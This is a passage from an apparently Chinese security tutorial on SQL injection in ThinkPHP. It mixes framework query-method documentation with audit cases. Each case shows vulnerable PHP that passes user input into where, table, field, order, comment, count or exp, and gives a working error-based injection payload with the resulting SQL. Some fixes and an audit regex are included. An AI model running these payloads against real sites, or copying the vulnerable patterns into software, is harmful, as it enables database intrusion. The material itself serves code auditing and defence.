<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM think_user WHERE type=1 AND status=1</span><br></pre></td></tr></table></figure>
<p>使用字符串条件的时候，建议配合预处理机制，确保更加安全，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;where(&quot;id=%d and username=&apos;%s&apos; and xx=&apos;%f&apos;&quot;,array($id,$username,$xx))-&gt;select();</span><br></pre></td></tr></table></figure>
<p>或者使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;where(&quot;id=%d and username=&apos;%s&apos; and xx=&apos;%f&apos;&quot;,$id,$username,$xx)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>如果<code>$id</code>变量来自用户提交或者URL地址的话，如果传入的是非数字类型，则会强制格式化为数字格式后进行查询操作。</p>
<p>字符串预处理格式类型支持指定数字、字符串等，具体可以参考vsprintf方法的参数说明。</p>
<h3 id="数组条件"><a href="#数组条件" class="headerlink" title="数组条件"></a>数组条件</h3><p>数组条件的where用法是ThinkPHP推荐的用法。</p>
<h5 id="普通查询"><a href="#普通查询" class="headerlink" title="普通查询"></a>普通查询</h5><p>最简单的数组查询方式如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$User = M(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$map[&apos;name&apos;] = &apos;thinkphp&apos;;</span><br><span class="line">$map[&apos;status&apos;] = 1;</span><br><span class="line">// 把查询条件传入查询方法</span><br><span class="line">$User-&gt;where($map)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>最后生成的SQL语句是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM think_user WHERE `name`=&apos;thinkphp&apos; AND status=1</span><br></pre></td></tr></table></figure>
<p><strong>实例：</strong><br>当使用I方法传入参数时如下    </p>
<pre><code>$data=M(&apos;user&apos;)-&gt;where(&apos;id=&apos;.I(&apos;id&apos;))-&gt;find();  
dump($data);
</code></pre><p>则可以构造语句<br>?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23<br>其完整sql语句为：<br>SELECT * FROM <code>thinkphp_user</code> WHERE ( id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)  ) LIMIT 1<br>漏洞成因为对传入的参数id没有过滤，造成SQL注入漏洞。<br>修复方法：把传入的参数转换为数组类型，就很好的避免的此漏洞。代码如下：</p>
<pre><code>$User=M(&quot;User&quot;);
$map[&apos;id&apos;]=I(&apos;id&apos;);
$User-&gt;where($map)-&gt;select();
</code></pre><p><strong>3.1.2 Thinkphp table注入</strong></p>
<h2 id="TABLE"><a href="#TABLE" class="headerlink" title="TABLE"></a>TABLE</h2><p>table方法也属于模型类的连贯操作方法之一，主要用于指定操作的数据表。</p>
<h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><p>一般情况下，操作模型的时候系统能够自动识别当前对应的数据表，所以，使用table方法的情况通常是为了：</p>
<ol>
<li>切换操作的数据表；</li>
<li>对多表进行操作；</li>
</ol>
<p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;table(&apos;think_user&apos;)-&gt;where(&apos;status&gt;1&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>也可以在table方法中指定数据库，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;table(&apos;db_name.think_user&apos;)-&gt;where(&apos;status&gt;1&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>table方法指定的数据表需要完整的表名，但可以采用下面的方式简化数据表前缀的传入，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;table(&apos;__USER__&apos;)-&gt;where(&apos;status&gt;1&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>会自动获取当前模型对应的数据表前缀来生成  <code>think_user</code>  数据表名称。</p>
<p>需要注意的是table方法不会改变数据库的连接，所以你要确保当前连接的用户有权限操作相应的数据库和数据表。 切换数据表后，系统会自动重新获取切换后的数据表的字段缓存信息。</p>
<p>如果需要对多表进行操作，可以这样使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;user.name,role.title&apos;)</span><br><span class="line">-&gt;table(&apos;think_user user,think_role role&apos;)</span><br><span class="line">-&gt;limit(10)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>为了尽量避免和mysql的关键字冲突，可以建议使用数组方式定义，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;user.name,role.title&apos;)</span><br><span class="line">-&gt;table(array(&apos;think_user&apos;=&gt;&apos;user&apos;,&apos;think_role&apos;=&gt;&apos;role&apos;))</span><br><span class="line">-&gt;limit(10)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>使用数组方式定义的优势是可以避免因为表名和关键字冲突而出错的情况。</p>
<blockquote>
<p>一般情况下，无需调用table方法，默认会自动获取当前模型对应或者定义的数据表。</p>
</blockquote>
<p><strong>案例：</strong></p>
<pre><code>M()-&gt;table(I(&apos;tab&apos;))-&gt;where(&apos;1=1&apos;)-&gt;find();
</code></pre><p>当传入的参数表名tab存在时，进入select查询，则可构造如下语句：</p>
<pre><code>?table=thinkphp_user where 1=1 and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23
</code></pre><p><strong>3.1.3 Thinkphp field注入</strong></p>
<h2 id="FIELD"><a href="#FIELD" class="headerlink" title="FIELD"></a>FIELD</h2><p>field方法属于模型的连贯操作方法之一，主要目的是标识要返回或者操作的字段，可以用于查询和写入操作。</p>
<h3 id="用于查询"><a href="#用于查询" class="headerlink" title="用于查询"></a>用于查询</h3><h5 id="指定字段"><a href="#指定字段" class="headerlink" title="指定字段"></a>指定字段</h5><p>在查询操作中field方法是使用最频繁的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;id,title,content&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>这里使用field方法指定了查询的结果集中包含id,title,content三个字段的值。执行的SQL相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT id,title,content FROM table</span><br></pre></td></tr></table></figure>
<p>可以给某个字段设置别名，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;id,nickname as name&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>执行的SQL语句相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT id,nickname as name FROM table</span><br></pre></td></tr></table></figure>
<h5 id="使用SQL函数"><a href="#使用SQL函数" class="headerlink" title="使用SQL函数"></a>使用SQL函数</h5><p>可以在field方法中直接使用函数，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;id,SUM(score)&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>执行的SQL相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT id,SUM(score) FROM table</span><br></pre></td></tr></table></figure>
<blockquote>
<p>除了select方法之外，所有的查询方法，包括find等都可以使用field方法。</p>
</blockquote>
<h5 id="使用数组参数"><a href="#使用数组参数" class="headerlink" title="使用数组参数"></a>使用数组参数</h5><p>field方法的参数可以支持数组，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(array(&apos;id&apos;,&apos;title&apos;,&apos;content&apos;))-&gt;select();</span><br></pre></td></tr></table></figure>
<p>最终执行的SQL和前面用字符串方式是等效的。</p>
<p>数组方式的定义可以为某些字段定义别名，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(array(&apos;id&apos;,&apos;nickname&apos;=&gt;&apos;name&apos;))-&gt;select();</span><br></pre></td></tr></table></figure>
<p>执行的SQL相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT id,nickname as name FROM table</span><br></pre></td></tr></table></figure>
<p>对于一些更复杂的字段要求，数组的优势则更加明显，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(array(&apos;id&apos;,&apos;concat(name,&apos;-&apos;,id)&apos;=&gt;&apos;truename&apos;,&apos;LEFT(title,7)&apos;=&gt;&apos;sub_title&apos;))-&gt;select();</span><br></pre></td></tr></table></figure>
<p>执行的SQL相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT id,concat(name,&apos;-&apos;,id) as truename,LEFT(title,7) as sub_title FROM table</span><br></pre></td></tr></table></figure>
<h5 id="获取所有字段"><a href="#获取所有字段" class="headerlink" title="获取所有字段"></a>获取所有字段</h5><p>如果有一个表有非常多的字段，需要获取所有的字段（这个也许很简单，因为不调用field方法或者直接使用空的field方法都能做到）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;select();</span><br><span class="line">$Model-&gt;field()-&gt;select();</span><br><span class="line">$Model-&gt;field(&apos;*&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>上面三个用法是等效的，都相当于执行SQL：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM table</span><br></pre></td></tr></table></figure>
<p>但是这并不是我说的获取所有字段，我希望显式的调用所有字段（对于对性能要求比较高的系统，这个要求并不过分，起码是一个比较好的习惯），那么OK，仍然很简单，下面的用法可以完成预期的作用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(true)-&gt;select();</span><br></pre></td></tr></table></figure>
<p><code>field(true)</code>的用法会显式的获取数据表的所有字段列表，哪怕你的数据表有100个字段。</p>
<h5 id="字段排除"><a href="#字段排除" class="headerlink" title="字段排除"></a>字段排除</h5><p>如果我希望获取排除数据表中的<code>content</code>字段（文本字段的值非常耗内存）之外的所有字段值，我们就可以使用field方法的排除功能，例如下面的方式就可以实现所说的功能：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;content&apos;,true)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>则表示获取除了content之外的所有字段，要排除更多的字段也可以：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;user_id,content&apos;,true)-&gt;select();</span><br><span class="line">//或者用</span><br><span class="line">$Model-&gt;field(array(&apos;user_id&apos;,&apos;content&apos;),true)-&gt;select();</span><br></pre></td></tr></table></figure>
<h3 id="用于写入"><a href="#用于写入" class="headerlink" title="用于写入"></a>用于写入</h3><p>除了查询操作之外，field方法还有一个非常重要的安全功能–<strong>字段合法性检测</strong>。field方法结合create方法使用就可以完成表单提交的字段合法性检测，如果我们在表单提交的处理方法中使用了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;title,email,content&apos;)-&gt;create();</span><br></pre></td></tr></table></figure>
<p>即表示表单中的合法字段只有<code>title</code>,<code>email</code>和<code>content</code>字段，无论用户通过什么手段更改或者添加了浏览器的提交字段，都会直接屏蔽。因为，其他是所有字段我们都不希望由用户提交来决定，你可以通过自动完成功能定义额外的字段写入。</p>
<p>同样的，field也可以结合add和save方法，进行字段过滤，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;field(&apos;title,email,content&apos;)-&gt;save($data);</span><br></pre></td></tr></table></figure>
<p>如果data数据中包含有title,email,content之外的字段数据的话，也会过滤掉。</p>
<p><strong>案例：</strong></p>
<pre><code>M(&apos;User&apos;)-&gt;field(array(&apos;id&apos;,&apos;username&apos;=&gt;I(&apos;name&apos;)))-&gt;select();
</code></pre><p>则存在注入，构造注入语句如下：</p>
<pre><code>?name=uname from thinkphp_user where 1=1 and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23
</code></pre><p>其sql语句如下：</p>
<pre><code>SELECT `id`,`username` AS uname from thinkphp_user where 1=1 and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# FROM `thinkphp_user`
</code></pre><p><strong>3.1.4 Thinkphp  alias、join、union注入</strong></p>
<h2 id="JOIN"><a href="#JOIN" class="headerlink" title="JOIN"></a>JOIN</h2><p>JOIN方法也是连贯操作方法之一，用于根据两个或多个表中的列之间的关系，从这些表中查询数据。</p>
<p>join通常有下面几种类型，不同类型的join操作会影响返回的数据结果。</p>
<ul>
<li><strong>INNER JOIN</strong>: 等同于 JOIN（默认的JOIN类型）,如果表中有至少一个匹配，则返回行</li>
<li><strong>LEFT JOIN</strong>: 即使右表中没有匹配，也从左表返回所有的行</li>
<li><strong>RIGHT JOIN</strong>: 即使左表中没有匹配，也从右表返回所有的行</li>
<li><strong>FULL JOIN</strong>: 只要其中一个表中存在匹配，就返回行</li>
</ul>
<p>join方法可以支持以上四种类型，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$Model = M(&apos;Artist&apos;);</span><br><span class="line">$Model</span><br><span class="line">-&gt;join(&apos;think_work ON think_artist.id = think_work.artist_id&apos;)</span><br><span class="line">-&gt;join(&apos;think_card ON think_artist.card_id = think_card.id&apos;)</span><br><span class="line">-&gt;select();</span><br></pre></td></tr></table></figure>
<p>join方法支持多次调用，但指定的数据表必须是全称，但我们可以这样来定义：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$Model</span><br><span class="line">-&gt;join(&apos;__WORK__ ON __ARTIST__.id = __WORK__.artist_id&apos;)</span><br><span class="line">-&gt;join(&apos;__CARD__ ON __ARTIST__.card_id = __CARD__.id&apos;)</span><br><span class="line">-&gt;select();</span><br></pre></td></tr></table></figure>
<p><code>__WORK__</code>和  <code>__CARD__</code>在最终解析的时候会转换为  <code>think_work</code>和  <code>think_card</code>。</p>
<p>默认采用INNER JOIN 方式，如果需要用其他的JOIN方式，可以改成</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;join(&apos;RIGHT JOIN __WORK__ ON __ARTIST__.id = __WORK__.artist_id&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>或者使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;join(&apos;__WORK__ ON __ARTIST__.id = __WORK__.artist_id&apos;,&apos;RIGHT&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<blockquote>
<p>join方法的第二个参数支持的类型包括：INNER LEFT RIGHT FULL。</p>
</blockquote>
<p>如果join方法的参数用数组的话，只能使用一次join方法，并且不能和字符串方式混合使用。 例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">join(array(&apos; __WORK__ ON __ARTIST__.id = __WORK__.artist_id&apos;,&apos;__CARD__ ON __ARTIST__.card_id = __CARD__.id&apos;))</span><br></pre></td></tr></table></figure>
<p>使用数组方式的情况下，第二个参数无效。因此必须在字符串中显式定义join类型，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">join(array(&apos; LEFT JOIN __WORK__ ON __ARTIST__.id = __WORK__.artist_id&apos;,&apos;RIGHT JOIN __CARD__ ON __ARTIST__.card_id = __CARD__.id&apos;))</span><br></pre></td></tr></table></figure>
<p><strong>案例：</strong><br>alias方法操作表的别名，和field方法类似，它一般和join方法成对出现，用于对数据的连贯操作。出现join和union方法的时候。只要能控制参数一般情况下都会产生注入。<br>代码审计时可以查找</p>
<pre><code>-&gt;(alias|join|union)\s*\((\$|\$_|I)
</code></pre><p>来进一步判断。<br><strong>3.1.5 Thinkphp order group having注入</strong></p>
<h2 id="ORDER"><a href="#ORDER" class="headerlink" title="ORDER"></a>ORDER</h2><p>order方法属于模型的连贯操作方法之一，用于对操作的结果排序。</p>
<p>用法如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;where(&apos;status=1&apos;)-&gt;order(&apos;id desc&apos;)-&gt;limit(5)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>注意：连贯操作方法没有顺序，可以在select方法调用之前随便改变调用顺序。</p>
<p>支持对多个字段的排序，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;where(&apos;status=1&apos;)-&gt;order(&apos;id desc,status&apos;)-&gt;limit(5)-&gt;select();</span><br></pre></td></tr></table></figure>
<blockquote>
<p>如果没有指定desc或者asc排序规则的话，默认为asc。</p>
</blockquote>
<p>如果你的字段和mysql关键字有冲突，那么建议采用数组方式调用，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;where(&apos;status=1&apos;)-&gt;order(array(&apos;order&apos;,&apos;id&apos;=&gt;&apos;desc&apos;))-&gt;limit(5)-&gt;select();</span><br></pre></td></tr></table></figure>
<h2 id="GROUP"><a href="#GROUP" class="headerlink" title="GROUP"></a>GROUP</h2><p>GROUP方法也是连贯操作方法之一，通常用于结合合计函数，根据一个或多个列对结果集进行分组 。</p>
<p>group方法只有一个参数，并且只能使用字符串。</p>
<p>例如，我们都查询结果按照用户id进行分组统计：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this-&gt;field(&apos;user_id,username,max(score)&apos;)-&gt;group(&apos;user_id&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>生成的SQL语句是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT user_id,username,max(score) FROM think_score GROUP BY user_id</span><br></pre></td></tr></table></figure>
<p>也支持对多个字段进行分组，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this-&gt;field(&apos;user_id,test_time,username,max(score)&apos;)-&gt;group(&apos;user_id,test_time&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>生成的SQL语句是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT user_id,test_time,username,max(score) FROM think_score GROUP BY user_id,test_time</span><br></pre></td></tr></table></figure>
<h2 id="HAVING"><a href="#HAVING" class="headerlink" title="HAVING"></a>HAVING</h2><p>HAVING方法也是连贯操作之一，用于配合group方法完成从分组的结果中筛选（通常是聚合条件）数据。</p>
<p>having方法只有一个参数，并且只能使用字符串，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this-&gt;field(&apos;username,max(score)&apos;)-&gt;group(&apos;user_id&apos;)-&gt;having(&apos;count(test_time)&gt;3&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>生成的SQL语句是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT username,max(score) FROM think_score GROUP BY user_id HAVING count(test_time)&gt;3</span><br></pre></td></tr></table></figure>
<p><strong>案例1 order：</strong></p>
<pre><code>M(&apos;User&apos;)-&gt;where(&apos;1=1&apos;)-&gt;order(array(&apos;id&apos;=&gt;I(&apos;orderby&apos;)))-&gt;select();
</code></pre><p>则构造如下语句：</p>
<pre><code>?orderby=,(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
</code></pre><p>生成sql语句如下：</p>
<pre><code>SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(CAST(VERSION() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1
</code></pre><p><strong>案例2 group:</strong><br>同order方法<br>当group的参数可控时，便可进行注入。</p>
<pre><code>$data=M(&apos;User&apos;)-&gt;field(&apos;max(score),username&apos;)-&gt;group(I(&apos;score&apos;))-&gt;select();  
dump($data);
</code></pre><p><strong>案例3 having:</strong><br>同上<br>当having的参数可控时，便可进行注入。</p>
<pre><code>$data=M(&apos;User&apos;)
-&gt;field(&apos;max(score),username&apos;)
-&gt;group(I(&apos;score&apos;))-&gt;select();
-&gt;having(I(&apos;having&apos;))
dump($data);
</code></pre><p>   <strong>3.1.6 Thinkphp comment注入</strong></p>
<h2 id="COMMENT"><a href="#COMMENT" class="headerlink" title="COMMENT"></a>COMMENT</h2><p>COMMENT方法 用于在生成的SQL语句中添加注释内容，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$this-&gt;comment(&apos;查询考试前十名分数&apos;)</span><br><span class="line">-&gt;field(&apos;username,score&apos;)</span><br><span class="line">-&gt;limit(10)</span><br><span class="line">-&gt;order(&apos;score desc&apos;)</span><br><span class="line">-&gt;select();</span><br></pre></td></tr></table></figure>
<p>最终生成的SQL语句是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT username,score FROM think_score ORDER BY score desc LIMIT 10 /* 查询考试前十名分数 */</span><br></pre></td></tr></table></figure>
<p><strong>案例：</strong><br>当comment的参数可控时，便存在漏洞。代码如下：</p>
<pre><code>M(&apos;User&apos;)-&gt;where(&apos;1=1&apos;)-&gt;comment(I(&apos;com&apos;))-&gt;select();
</code></pre><p>构造语句如下：</p>
<pre><code>?com=aaa*/ and 1=updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)%23
</code></pre><p>生成sql语句如下：</p>
<pre><code>SELECT * FROM `thinkphp_user` WHERE ( 1=1 )  /* aaa*/ and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# */
</code></pre><p><strong>3.1.7 Thinkphp 索引注入</strong></p>
<h2 id="INDEX"><a href="#INDEX" class="headerlink" title="INDEX"></a>INDEX</h2><p>index方法用于数据集的强制索引操作，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Model-&gt;force(&apos;user&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>对查询强制使用user索引，user必须是数据表实际创建的索引名称。<br>案例：<br>同comment注入</p>
<pre><code>$data=M(&apos;User&apos;)-&gt;force(I(&apos;f&apos;))-&gt;select();
dump($data);
</code></pre><p>当force方法传入的参数可控时，便存在漏洞，可用与comment漏洞相同payload进行注入。<br><strong>3.1.8 Thinkphp query、execute、聚合方法</strong></p>
<h2 id="QUERY方法"><a href="#QUERY方法" class="headerlink" title="QUERY方法"></a>QUERY方法</h2><p>query方法用于执行SQL查询操作，如果数据非法或者查询错误则返回false，否则返回查询结果数据集（同select方法）。</p>
<p>使用示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$Model = new \Think\Model() // 实例化一个model对象 没有对应任何数据表</span><br><span class="line">$Model-&gt;query(&quot;select * from think_user where status=1&quot;);</span><br></pre></td></tr></table></figure>
<h2 id="EXECUTE方法"><a href="#EXECUTE方法" class="headerlink" title="EXECUTE方法"></a>EXECUTE方法</h2><p>execute用于更新和写入数据的sql操作，如果数据非法或者查询错误则返回false ，否则返回影响的记录数。</p>
<p>使用示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$Model = new \Think\Model() // 实例化一个model对象 没有对应任何数据表</span><br><span class="line">$Model-&gt;execute(&quot;update think_user set name=&apos;thinkPHP&apos; where status=1&quot;);</span><br></pre></td></tr></table></figure>
<p>案例 聚合方法：<br>当传入参数可控时便存在漏洞，如下：</p>
<pre><code>$data = M(&apos;User&apos;)-&gt;count(I(&apos;count&apos;));  
dump($data);
</code></pre><p>构造语句如下：</p>
<pre><code>?count=id) AS tp_count FROM `thinkphp_user` where 1=1 and 1=updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)%23
</code></pre><p>其sql语句如下：<br> <code>SELECT COUNT(id) AS tp_count FROM</code>thinkphp_user<code>where 1=1 and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#) AS tp_count FROM</code>thinkphp_user</p>
<h2 id="4-2-exp注入"><a href="#4-2-exp注入" class="headerlink" title="4.2 exp注入"></a>4.2 exp注入</h2><h2 id="EXP：表达式1"><a href="#EXP：表达式1" class="headerlink" title="EXP：表达式1"></a>EXP：表达式1</h2><p>支持更复杂的查询情况 例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$map[&apos;id&apos;]  = array(&apos;in&apos;,&apos;1,3,8&apos;);</span><br></pre></td></tr></table></figure>
<p>可以改成：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$map[&apos;id&apos;]  = array(&apos;exp&apos;,&apos; IN (1,3,8) &apos;);</span><br></pre></td></tr></table></figure>
<p>exp查询的条件不会被当成字符串，所以后面的查询条件可以使用任何SQL支持的语法，包括使用函数和字段名称。查询表达式不仅可用于查询条件，也可以用于数据更新，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$User = M(&quot;User&quot;); // 实例化User对象</span><br><span class="line">// 要修改的数据对象属性赋值</span><br><span class="line">$data[&apos;name&apos;] = &apos;ThinkPHP&apos;;</span><br><span class="line">$data[&apos;score&apos;] = array(&apos;exp&apos;,&apos;score+1&apos;);// 用户的积分加1</span><br><span class="line">$User-&gt;where(&apos;id=5&apos;)-&gt;save($data); // 根据条件保存修改的数据</span><br></pre></td></tr></table></figure>
<p><strong>案例：</strong></p>
<pre><code>$map=array();  
$map[&apos;username&apos;]=$_GET[&apos;user&apos;];  
$data=M(&apos;User&apos;)-&gt;where($map)-&gt;find();  
dump($data);
</code></pre><p>当传入参数可控且无过滤时，构造如下payload：<br>?user[0]=exp&amp;user[1]==1%20and%201=updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)%23<br>其SQL语句如下：</p>
<pre><code>SELECT * FROM `thinkphp_user` WHERE `username` =1 and 1=updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# LIMIT 1
</code></pre><p> 修复方法：使用官方推荐的I()方法传入参数就可以很好地过滤传入的参数，修复此漏洞。</p>
<h2 id="4-3-Action参数注入"><a href="#4-3-Action参数注入" class="headerlink" title="4.3 Action参数注入"></a>4.3 Action参数注入</h2><p><strong>案例：</strong></p>
<pre><code>if(intval($id)&gt;=1){  
  $data=M(&apos;User&apos;)-&gt;where(&apos;id=&apos;.$id)-&gt;select();  
  dump($data);
